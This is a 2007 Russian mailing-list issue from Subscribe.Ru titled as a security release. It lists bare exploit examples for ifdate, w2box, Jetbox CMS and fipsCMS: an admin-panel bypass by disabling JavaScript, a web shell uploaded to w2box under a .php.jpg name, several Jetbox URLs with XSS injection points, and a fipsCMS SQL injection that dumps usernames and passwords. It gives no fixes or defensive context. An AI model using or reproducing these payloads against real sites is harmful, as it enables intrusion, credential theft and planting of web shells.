Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в ifdate, w2box, Jetbox CMS, (comp.paper.supuser) : Рассылка : Subscribe.Ru

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в ifdate, w2box, Jetbox CMS,

IT-безопасность в быту и не только

Рассылка закрыта

Статистика

Отправляет email-рассылки с помощью сервиса Sendsay

Доставка подписки заблокирована с 2024-10-02 из-за ошибок доставки.
Для возобновления доставки подписки, нажмите сюда.

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Май 2007 →
	1	2	3	4 04.05.2007 09:05:38 14:05:24	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

Автор

Forester

1.394 подписчиков
-1 за неделю

← Все выпуски →

← Май 2007 →

4 04.05.2007 09:05:38 14:05:24

Компьютер для продвинутых пользователей

ifdate 2

Пример:
Отключаем в браузере javascript и заходим по адресу:
http://victim.com/[path]/admin/

w2box 2.0

Пример:
Переименновываем шелл из .php в .php.jpg и закачиваем...

Jetbox CMS 2.1

Пример:
http://127.0.0.1/jetbox/index.php/view/search/?path=[xss]
http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=[xss]
http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1&country=[xss]
http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=[xss]
http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=[xss]
http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=[xss]http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@localhost.com&required=[xss]
http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@localhost.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=[xss]
http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipien

fipsCMS 2.1

Пример:
/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/

Не забудьте проголосовать за выпуск!

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Меня можно найти:	ICQ - 273214003
	e-mail - isdmi1::mail.ru
Отблагодорить:	WM - R407426923581

В избранное